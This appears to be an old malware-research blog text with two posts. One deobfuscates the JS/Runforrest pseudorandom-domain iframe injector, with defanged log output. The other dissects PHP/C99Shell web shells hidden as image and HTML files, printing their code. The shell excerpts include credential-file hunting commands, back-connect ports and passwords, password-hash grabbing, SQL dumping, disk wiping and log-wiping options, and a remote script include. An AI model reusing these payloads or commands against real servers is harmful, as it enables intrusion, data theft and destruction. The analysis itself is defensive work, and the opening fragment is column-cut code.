ar101-=0.0147;var var102=0.001;var102--}function man(and,qua){for
ar var8=4014;if(var8!=3947){var var4=21;if(var4!=0.0116){var var2
ar4=0.052;if(var4!=2753){var var2=true;var var3=['apt','gag']}ret
 var13=0.017;if(var13!=0){var var12=4296}}}}    var str='';functi
','has','ire'];var24++}while(var24<5);return zig}        str+=let
r26-=5819;var var27=0.003;var27++}}}var var31=[0,70,50,30,10,20,6
,got,nut){for(var var38=0;var38<9;var38++){var var39=8962;var39++
sr'+'c', 'h00p://'+domainName+'/in.cgi?14'); var var49=4490;var49'hidden'; var var58='YKtHrZfxVR';
↑The script is shown perfectly clear, all you have to do is just figure the domain name for it.. PS: Malware Names as per check in VT(9/43)--->>[HERE]
F-Secure                 : Trojan.Iframe.BDG
GData                    : Trojan.Iframe.BDG
AntiVir                  : JS/RunForest.Q
eScan                    : Trojan.Iframe.BDG
nProtect                 : Trojan.Iframe.BDG
BitDefender              : Trojan.Iframe.BDG
Ikarus                   : Trojan.IFrame

And the type C looks like as per exposed in the previous post as per written here ---->>[PREVIOUS-POST PSEUDO RANDOM]

3. Aggressive infection of Pseudorandom urls type A

Type A is somehow aggressively came out from nowhere to infect sites 
with multiple infection urls, with using more than one pattern/structure,
Below is real sample of one domain infected by Pseudorandom aggressive infector:
(This is the #hint for our friends in #MalwareMustDie to dig deeper)

Pattern 1 (common ones)
Pattern 2 (longer ones with encoded %E2%80%99 string "'")
Pattern 3 - Repeatedly loops url-subdirs
↑These infected urls doesn't look good at all, does it? Which making me think it would be better to explain my poor way in cracking the Type A Obfuscation as per written below, with hope that some automation system can adjust and make the adjustment necessary.. [Additional] The Type A infection aiming vBulletin forum scripts You can see the PoC details of this analysis here in pastebin--->>[HERE] MANUAL OBFUSCATION METHOD (PSEUDO RANDOM DEOBFS SPECIFIC) Let's take an example of the first url shown above:
I fetch it from my FreeBSD box with hiding my credentials...
           => `index.html'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22,742 (22K) [text/html]
22:28:13 (33.66 KB/s) - `index.html' saved [22742/22742]
The file inside looks like this Pastebin --->>[HERE] ..looks nice & long.. Running this url in "browser logic" may ending up to log like this:
[h00p] URL: h00p://www・ (Status: 200, Referrer: None)
<meta content="0; URL=site/" h00p-equiv="Refresh"/>
[Navigator URL Translation] site/ -->  h00p://www・
[h00p] URL: h00p://www・ (Status: 200, Referrer: h00p://www・
[h00p Redirection (Status: 302)] Content-Location: h00p://www・ --> Location: h00p://www・
[Navigator URL Translation] site/ -->  h00p://www・
[h00p] URL: h00p://www・ (Status: 200, Referrer: h00p://www・
[h00p Redirection (Status: 302)] Content-Location: h00p://www・ --> Location: h00p://www・
<object align="" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="h00p://
ockwave/cabs/flash/,0,0,0" height="250" id="thaflash" style="z-index:1" width="500">
                <param name="wmode" value="transparent"></param>
                <param name="movie" value="default.swf"></param>
                <param name="quality" value="high"></param>
                <param name="Scale" value="ShowAll"></param>
                                <param name="wmode" value="opaque"></param>
                                <param name="FlashVars" value="BackgroundId=1&ObjectId=1&!+"></param>
                <embed align="" bgcolor="#ffffff" flashvars="BackgroundId=1&ObjectId=1&!+" height="250" name="thaflash" pluginspage="h00p://www・" quality="high" src="default.swf" type="application/x-shockwave-flash" width="500" wmode="opaque"></embed>
[Shellcode Analysis] URL Detected: h00p://,0,0,0
[h00p] URL: h00p://,0,0,0 (Status: 200, Referrer: h00p://www・
[h00p Redirection (Status: 302)] Content-Location: h00p://
b#version=7,0,0,0 --> Location: h00p://
Saving remote content at h00p://,0,0,0 (MD5: 97e6d7379f4fab31df4f89fec878765d)
ActiveXObject: D27CDB6E-AE6D-11CF-96B8-444553540000
<meta content="text/html; charset=utf-8" h00p-equiv="Content-Type"/>
<meta name="KEYWORDS"/>
<meta name="DESCRIPTION"/>
<meta content="Parallels Plesk Sitebuilder 4.5 for Windows" name="GENERATOR"/>
[Meta] Generator: Parallels Plesk Sitebuilder 4.5 for Windows
<param name="wmode" value="transparent"></param>
<param name="movie" value="default.swf"></param>
[Navigator URL Translation] default.swf -->  h00p://www・
[h00p] URL: h00p://www・ (Status: 404, Referrer: h00p://www・
FileNotFoundError: h00p://www・
<param name="quality" value="high"></param>
<param name="Scale" value="ShowAll"></param>
<param name="wmode" value="opaque"></param>
<param name="FlashVars" value="BackgroundId=1&ObjectId=1&!+"></param>
<embed align="" bgcolor="#ffffff" flashvars="BackgroundId=1&ObjectId=1&!+" height="250" name="thaflash" pluginspage="h00p://www・" quality="high" src="default.swf" type="application/x-shockwave-flash" width="500" wmode="opaque"></embed>
[Navigator URL Translation] default.swf -->  h00p://www・
[h00p] URL: h00p://www・ (Status: 404, Referrer: h00p://www・
FileNotFoundError: h00p://www・
[Window] Eval argument length > 64 (7413)
[Window] Eval argument length > 64 (1776)
↑which making you think that no infection happened... While if you see the deobfuscated code closely you'll about to sure 99% that malwares did these injection. So.. we should CRACK it, manually. Deobfuscating stuff like this is faster to do it offline, use any SpiderMonkey base javascript emulator to see the flow and play with some string which cannot be run well and changed it with whatever variable accepted, and with luck you'll come to the first deobfuscation like this ---->>[HERE] The upper one is a one line code resulted by deobfs and the next part is - the readable format of it. So we have another deobfuscation level, so let's crack it again and you'll get the Pseudorandom code like this --->>[HERE] So we know this is the Pseudorandom code now, to go to payload just solved the code.. The key is in the randomized domain as per coded in IFRAME part in this line↓
ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2"); 
If we get the var domainName then we will sleep soon! This is my trick, the easy way; change the IFRAME part to look like this:
            var unix = Math.round(+new Date()/1000);
            var domainName = generatePseudoRandomString(unix, 16, 'ru');
            document.write(domainName); //←THIS IS ADDED!!!
//            ifrm = document.createElement("IFRAME"); 
//            ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2"); 
//   = "0px"; 
//   = "0px"; 
//   = "hidden"; 
//            document.body.appendChild(ifrm);
1. Remove all functions related to the browser object, 2. Comment the ifrm object, and focus to see result of domainName by feeeding it up drectly to generatePseudoRandomString 3. Use the document.write command to burp domainName's value
Below is my deobfs tools, a proof of burping domain name: The code resulted to which figuring the below malicious url used in the malicious IFRAME:
1. If you use jsunpack, it cracked inly the first level of the code.. 2. If you use ****wet for example, it will be freezed, so dont do it until they update the engine to avoid the freezing..
!!NEW!! Additionals - PseudoRandom Logic Cracking #Tool With the team effort in #MalwareMustDie, with the contribution of anonymous researchers we are releasing the template to crack the JS/Runforrest a.k.a. PseudoRandom with the below "Neutralized" source code which can be used as ultimate code to crack PseudoRandom Infected Target URL, we call it "F*ck the dumbass" Script" :-)

F*ck the dumbass

HOW TO USE This tool: 1. You can copy this code locally and save it as HTML file, 2. Edit the contents of function generatePseudoRandomString, RandomNumberGenerator, and nextRandomNumber with the value you got during De-obfuscation 3. Run the HTML locally via your browser like screenshot below: ↑And click that button 4. The tool will calculate the time based random and burp you with the current value immediately as per below snapshot: 5. For the online demonstration of this tool, you can safely TRY it here--->>[ToolOnlineURL] 6. Crusader's log: 7. A bruteforce method of the latest detected PseudoRandom can be viewed here-->>[HERE] These domains can be registered AND sinkholed to prevent next infections. Contributed in #MalwateMustDie session by @EricOpdyke : 8. The W****et #BUG in analyzing current sample is reported in public after being tweeted directly by the developer member as per:


Monday, October 1, 2012

How EVIL the PHP/C99Shell can be? From SQL Dumper, Hacktools, to Trojan Distributor Future?

*) This post is dedicated to MalwareMustDie loyal friends!

Maybe some of you read our previous blog (HERE) when we cracked last encrypted code used by gang of Pbot malware.
Recently we're on the Exploit Kit, but during last hunt we had in #MalwareMustDie, sniper team aimed different infector's vector. For example, in previous blog (HERE) we nailed a Shanghai Chinese individual who spread Online Game infectors Trojan using Exploit CVE-2012-1889.
BUT.. the fun of the week was actually when our sniper spotted the raising infections of the PHP/C99Shell malware! :-)
Our members cracked and exposed some cases in urls between Sept 28th to 30th regarding to the PHP/C99Shell. YES PHP/C99Shell might not in the AntiVirus companies FIRST agenda, but these threat is actually do the bigger damage to the servers, so we think you should know what we found. It was interesting findings and including some IMPORTANT information, so here we go!
PS: We're not going to expose them one by one (actually we did 12 cases of these), but we categozed them into the 3(three) interesting cases:

TYPE #1 - An SQL Database Dumper of PHP/C99Shell 

We found it here: (still up, so you can check it out), yesterday log:
--16:05:18--  h00p://     => `asd.jpg'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,234 (43K) [image/jpeg]
What looks like image is actually PHP script like: it has the obfuscation like below....
Which said "eval(gzinflate(base64_decode", if you run it in any PHP environment you'll get the eval as per shown in neutralized code here:--->>[PASTEBIN] The version and source url can be seen below:
 $shver = "2.0 madnet edition";
 if (empty($surl))
   $surl = $_SERVER['PHP_SELF'];
 $surl = htmlspecialchars($surl);
 $timelimit = 0;
 $host_allow = array("*");
 $login_txt = "Admin area";
 $accessdeniedmess = "<a href=\"h00p://\">c99madshell v.".$shver."</a>: access denied";
 $gzipencode = TRUE;
 $c99sh_sourcesurl = "h00p://";
Binding to these ports:
 $bindport_port = "31373";
 $bc_port = "31373";
 $datapipe_localport = "8081";
A nice interface will come up: It practically hacked the compromises system, like the snip below, current dir files , PHP config, web htaccess & shell data exposed..
   array("find all suid files", "find / -type f -perm -04000 -ls"),  
   array("find suid files in current dir", "find . -type f -perm -04000 -ls"),  
   array("find all sgid files", "find / -type f -perm -02000 -ls"),  
   array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),  
   array("find files", "find / -type f -name"),  
   array("find config* files", "find / -type f -name \"config*\""),  
   array("find config* files in current dir", "find . -type f -name \"config*\""),  
   array("find all writable folders and files", "find / -perm -2 -ls"),  
   array("find all writable folders and files in current dir", "find . -perm -2 -ls"),  
   array("find all service.pwd files", "find / -type f -name service.pwd"),  
   array("find service.pwd files in current dir", "find . -type f -name service.pwd"),  
   array("find all .htpasswd files", "find / -type f -name .htpasswd"),  
   array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),  
   array("find all .bash_history files", "find / -type f -name .bash_history"),  
   array("find .bash_history files in current dir", "
   find . -type f -name .bash_history"),  
   array("find all .fetchmailrc files", "
   find / -type f -name .fetchmailrc"),  
   array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),  
   array("list file attributes on a Linux second extended file system", "lsattr -va"),  
   array("show opened ports", "netstat -an | grep -i listen") );
Can remotely intimate your server permissions bu Web GUI:
$owner["read"] = ($mode & 00400)?"r":"-";
$owner["write"] = ($mode & 00200)?"w":"-";
$owner["execute"] = ($mode & 00100)?"x":"-";
$group["read"] = ($mode & 00040)?"r":"-";
$group["write"] = ($mode & 00020)?"w":"-";
$group["execute"] = ($mode & 00010)?"x":"-";
$world["read"] = ($mode & 00004)?"r":"-";
$world["write"] = ($mode & 00002)? "w":"-";
$world["execute"] = ($mode & 00001)?"x":"-";
$o["r"] = ($mode & 00400) > 0;
$o["w"] = ($mode & 00200) > 0;
$o["x"] = ($mode & 00100) > 0;
$g["r"] = ($mode & 00040) > 0;
$g["w"] = ($mode & 00020) > 0;
$g["x"] = ($mode & 00010) > 0;
$w["r"] = ($mode & 00004) > 0;
$w["w"] = ($mode & 00002) > 0;
$w["x"] = ($mode & 00001) > 0;
SQL dumps (if there any database..)
function mysql_dump($set)
{ global $shver;
  $sock = $set["sock"];
  $db = $set["db"];
  $print = $set["print"];
  $nl2br = $set["nl2br"];
  $file = $set["file"];
  $add_drop = $set["add_drop"];
  $tabs = $set["tabs"];
  $onlytabs = $set["onlytabs"];
  $ret = array();
  $ret["err"] = array();
$out = "# Dumped by C99madShell.SQL v. ".$shver.
    "# Home page:
    ## Host settings:# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." 
      (".getenv("SERVER_NAME").")"."# Date: ".date("d.m.Y H:i:s")."
     # DB: \"".$db."\"#---------------------------------------------------------";
$c = count($onlytabs);
foreach($tabs as $tab)
The detection ratio of this mess is as below VT:
MD5: 8b459895a539e944ed2fd07a518c93fe File size: 43.2 KB ( 44234 bytes ) File name: asd.jpg File type: PHP Tags: php Detection: 15 / 33 Analysis date: 2012-09-29 15:21:52 UTC ( 1 日, 16 時間 ago ) URL:--------->>[VirusTOTAL]
TYPE #2 - An injected/hacked html with the PHP/C99Shell Most of the PHP/C99Shell implemented in the site who has the FTP credential leaked or the PHP/FTP/CMS site which having remote file injection arbitrary flaw. It's rare but case like Exploit Kite injection code to the existing HTML also found. Below is the case:
--16:50:13--  hp://
           => `About-the-UAE.html'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
16:50:18 (73.24 KB/s) - `About-the-UAE.html' saved [190110]
We neutralized the code of this page so you can see it here-->>[PASTEBIN] Snip of the PHP/C99Shell code was starting in the mid of HTML: It has the nice GUI too, like this: With the evil functions below: The backdoor: (see the decoded url parts)...
if ($surl_autofill_include and !$_REQUEST["k1r4_surl"]) {$include = "&"; 
foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); 
$name = urldecode($v[0]); $value = urldecode($v[1]); 
foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) 
{if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} 
if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}</p><p>
$gzipencode = TRUE; //Encode with gzip?</p><p>
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)</p><p>
$k1r4_updateurl = "h00p://"; //Update server</p><p>
$k1r4_sourcesurl = "h00p://"; //Sources-server</p><p>
$nixpwdperpage = 100; // Get first N lines from /etc/passwd</p><p>
$bindport_pass = "k1r4";  // default password for binding</p><p>
$bindport_port = "31373"; // default port for binding</p><p>
$bc_port = "31373"; // default port for back-connect</p><p>
$datapipe_localport = "8081"; // default port for datapipe</p><p>
Aiming windows OS too....
$win = strtolower(substr(PHP_OS,0,3)) == "win";</p><p>
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)</p><p>
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)</p><p>
;-) accidentally saw the actor contacts:
$log_email = ""; //Default e-mail for sending logs</p><p>
These are the file types definition used for this malwaare:
Main menu functions(Encoder, Tools, ProcessID, FTP Brute, SQL Dump, Bot Update, SelfRemove..)
array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),</p><p>
array("<b>Self remove</b>",$surl."act=selfremove"),</p><p>
array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")</p><p>
Like previous one, has the same functions but this one is using cookie as one of security stuff..
 global $sess_data;</p><p>
 $sess_data = $data;</p><p>
 $data = serialize($data);</p><p>
It used obfuscation too :
<script type="text/javascript">document.write('\uOO3c\uOO53\uOO43\uOO52\uOO49\uOO5O\uOO54\uOO2O\uOO53\uOO52
leads to..
<SCRIPT SRC=h00p://www.shellci・biz/yazciz/ciz.js></SCRIPT>
Starting from line 1089 you'll see the dumping SQL data by hacking/using your own SQL database table to dumps and accessing it from remote...
?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"> <input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php</p><p>
    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}</p><p>
All of these are WebGUI base operations, amazing! Server status (also via WebGUI)
$acts = array("","newdb","serverstatus","servervars","processes","getfile");</p><p
if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><   
ion="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input typ   
en" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type
$result = mysql_query("SHOW PROCESSLIST", $sql_sock);</p><p>
echo "<center><b>Processes:</b><br><br>";</p><p>     
echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#000000 bor     
Here goes your unix server credentials...
 displaysecinfo("OS Version?",myshellexec("cat /proc/version"));</p><p>
 displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));</p><p>
 displaysecinfo("Distrib name",myshellexec("cat /etc/"));</p><p>
 displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));</p><p>
 displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));</p><p>
 displaysecinfo("RAM",myshellexec("free -m"));</p><p>
 displaysecinfo("HDD space",myshellexec("df -h"));</p><p>
 displaysecinfo("List of Attributes",myshellexec("lsattr -a"));</p><p>
 displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));</p><p>
 displaysecinfo("Is cURL installed?",myshellexec("which curl"));</p><p>
 displaysecinfo("Is lynx installed?",myshellexec("which lynx"));</p><p>
 displaysecinfo("Is links installed?",myshellexec("which links"));</p><p>
 displaysecinfo("Is fetch installed?",myshellexec("which fetch"));</p><p>
 displaysecinfo("Is GET installed?",myshellexec("which GET"));</p><p>
 displaysecinfo("Is perl installed?",myshellexec("which perl"));</p><p>
 displaysecinfo("Where is apache",myshellexec("whereis apache"));</p><p>
 displaysecinfo("Where is perl?",myshellexec("whereis perl"));</p><p>
 displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));</p><p>
 displaysecinfo("locate h00pd.conf",myshellexec("locate h00pd.conf"));</p><p>
 displaysecinfo("locate my.conf",myshellexec("locate my.conf"));</p><p>
 displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));</p><p>}
Seems your WinNT password cannot be cracked by this shell :-)
  $v = $_SERVER["WINDIR"]."\repair\sam";</p><p>
  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}</p><p>
  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}</p><p>
System passwords breach, disk eraser, log wiper, kernel attack...
OPTION VALUE="uname -a">Kernel version

OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins

OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!

OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?

OPTION VALUE="which wget curl w3m lynx">Downloaders?

OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO

OPTION VALUE="netstat -atup | grep IST">Open ports

OPTION VALUE="locate gcc">gcc installed?

OPTION VALUE="rm -Rf">Format box (DANGEROUS)

OPTION VALUE="wget">WIPELOGS PT1 (If wget installed)

WIPELOGS PT2 OPTION VALUE="./zap2">WIPELOGS PT3 OPTION VALUE="wget">Kernel attack (Krad.c) PT1 (If wget installed)< OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)

And this dangerous mess is detected in VT as per below:
MD5: fcd5b6c2d745270b7cf3ae880d7c914b File size: 185.7 KB ( 190154 bytes ) File name: About-the-UAE.html File type: HTML Tags: html Detection: 18 / 43 Analysis date: 2012-09-29 15:41:42 UTC ( 1 日, 16 時間 ago ) URL:---------->>[VIRUSTOTAL]
↑OK, seems like the more dangerous PHP/C99Shell the lower detection rate will be? (smile), so let's pick the most dangerous one and see what happen! TYPE #3 - The very Dangerous Type of PHP/C99Shell The source was here:
           => `25271.jpg'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200
This is a very sophisticated model. I am sure you'll agree if you see the code.. You can read the below comments by seeing the source code-->>[PASTEBIN] As per above type 1 and 2, this one has additional functions which - the author was so kind (= so retarted) to explain the all functions & future dev:
*  sniperxcode, a modded sniperxcode, which is a: $count=0; while($count==0){ echo ' mod of a'; }
*  By ssniperxcode - the 11-year-old hacker :)
*  Greetz to all my friends in #lobby
*  A big, fat "fuck you" to:
*   - HellBound Hackers (you're also part of the next on the list, except you can't even deface!)
*   - people who deface because they can't root and think they're 1337
*   - idiots who add mail() to their shells so they can log your ownages
*   - idiots who add mail() to their shells so they can log your ownages and mess up the variables so it doesn't even work!
*   - MPAA, RIAA, and all those other arse-hole anti-p2p organizations
*  lack of money and parental freedom leaves me with no site to advertise xD
*  Newer Mods (added by me) for v2 --
*  fixed a bug where deleting something from a path that has a space in it would return you to an invalid dir
*  fixed the *nix aliases where the cmds were in the name and the names were executed :S
*  added md5/sha1 file checksums
*  removed fgdump (no need for three programs that do the same f-ing thing :P) !!! 1 mb saved !!!
*  Old Mods (added by me) for v1 --
*  added the trojan executer
*  cleaned up the interface in general
*  added windows login hash grabber + sam/fg/pwdump2
*  added mass code injector (thanks SubSyn)
*  added pre-compiled h00lyshit and raptor_chown
*  added log cleaners for both *nix and windows
*  removed all the shitty/non-working functions in the drop-down boxes
*  fixed the google kernel thing (the search variables were fuxxed up)
*  made the dir listing easier to read with the alternating bgcolors
*  little optimizations in code here and there (i'm an optimization whore tbh)
*  submit md5/sha1 hash to cracking sites
*  made that awesome logo ;)
*  added the disabled php functions thing (took from r57shell)
*  added better windows/*nix-specific aliases
*  cleaned up the safe-mode bypass functions (wow, some of the shittiest code i've ever seen o_O )
*  wordlist md5/sha1 cracker
*  What I Plan to Do Next --
*  smaller size (somehow) :S
*  more sploits
*  allow input for dir to unpack exploits to
*  better trojans/backdoors
*  more functions/aliases
*  maybe move stuff around/change theme
*  make the php picture in the dir listing white for easier readability
*  take a first look at the sql section o.O
*  remove:
*   - more of those stupid spaces after every line
*   - more " and change them to ' for faster execution
*   - a bunch of other stupid code things (example:  echo("$msg");  (wtf... :S))
And he "really mean it" with so many improvements, like below details.. Straight forward password dumping code:
There goes your libc...
Trojan interraction:
Usage of tor...
Backdoor shell...
$bindport_pass = 'c99';  // default password for binding 
$bindport_port = '31373'; // default port for binding 
$bc_port = '5992'; // default port for back-connect 
$datapipe_localport = '8081'; // default port for datapipe 
And I am telling you, this model is improved A LOT:
  array('-----------------------------------------------------------', 'ls -la'),
  array('Currently Logged in Users', 'w'),
  array('Last User to Connect', 'lastlog'),
  array('Find Users Without a Password', 'cut -d: -f1,2,3 /etc/passwd | grep ::'),
  array('Is /etc Writable?', 'find /etc/ -type f -perm -o+w 2> /dev/null'),
  array('Installed Downloaders', 'which wget curl w3m lynx'),
  array('Open Ports', 'netstat -an | grep -i listen'),
  array('Box Uptime', 'uptime'),
  array('System Variables', 'set'),
  array('ARP table', 'arp -a'),
  array('Patch Level for RedHat 7.0', 'rpm -qa'),
  array('Network Interfaces', 'ifconfig'),
  array('Mounted Filesystems', 'mount'),
  array('Find Suid Bins', 'find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null'),
  array("Find All Suid Files", "find / -type f -perm -04000 -ls"), 
  array("Find Suid Files in Current Dir", "find . -type f -perm -04000 -ls"), 
  array("Find All Sgid Files", "find / -type f -perm -02000 -ls"), 
  array("Find Sgid Files in Current Dir", "find . -type f -perm -02000 -ls"), 
  array("Find Files", "find / -type f -name"), 
  array("Find config* Files", "find / -type f -name \"config*\""), 
  array("Find config* Files in Current Dir", "find . -type f -name \"config*\""), 
  array("Find All Writable Folders and Files", "find / -perm -2 -ls"), 
  array("Find All Writable Folders and Files in Current Dir", "find . -perm -2 -ls"), 
  array("Find All service.pwd Files", "find / -type f -name service.pwd"), 
  array("Find service.pwd Files in Current Dir", "find . -type f -name service.pwd"), 
  array("Find All .htpasswd Files", "find / -type f -name .htpasswd"), 
  array("Find .htpasswd Files in Current Dir", "find . -type f -name .htpasswd"), 
  array("Find All .bash_history Files", "find / -type f -name .bash_history"), 
  array("Find .bash_history Files in Current Dir", "find . -type f -name .bash_history"), 
  array("Find All .fetchmailrc Files", "find / -type f -name .fetchmailrc"), 
  array("Find .fetchmailrc Files in Current Dir", "find . -type f -name .fetchmailrc"), 
  array("List File Attributes on a Linux Second Extended File System", "lsattr -va"), 
Added ARP Table, IP config, Net sharing data grabber too...
 $cmdaliases = array( 
  array('-----------------------------------------------------------', 'dir'),
  array('Active Connections', 'netstat -an'),
  array('ARP Table', 'arp -a'),
  array('Net Shares', 'net use'),
  array('IP Configuration', 'ipconfig /all'),
  array('Disk Quotas', 'fsutil quota query '.$pd[0]),
  array('Drive Type', 'fsutil fsinfo drivetype '.$pd[0])
The Web GUI of the new functions are as follows (and many more..)

This part↓ is like what TYPE #2 has.. While the detection ratio in VT is:

MD5: 135bd38bc453bb440613196fd51c584e File size: 541.7 KB ( 554744 bytes ) File name: 25271.jpg File type: unknown Tags: php Detection: 31 / 43 Analysis date: 2012-09-29 15:17:15 UTC ( 1 日, 18 時間 ago ) URL:---------->>[VIRUS-TOTAL]
The moral of this post is: 1. PHP/C99Shell Malware is not dying, it raised with better function 2. The Infection of C99Shell arise again from Sept 28th 2012 2. Someone must put attention to PHP/C99Shell commercial development 3. [BEWARE] The integration/connection between this malware with Exploit Kit is started to be detected !!NEW!! IMPORTANT! Additional: New type are also found as per days gone by... here are additional (new type): 1. Please see decode part of the obfuscated .C code as per tweeted by @Cephurs: 2. Please see the decode part of obfuscated ELF binary as backdoor by @MalwareMustDie: 3. Please see the ELF server hack exec binary wrapped in TGZ as/mentioned by @KennyMacDermid: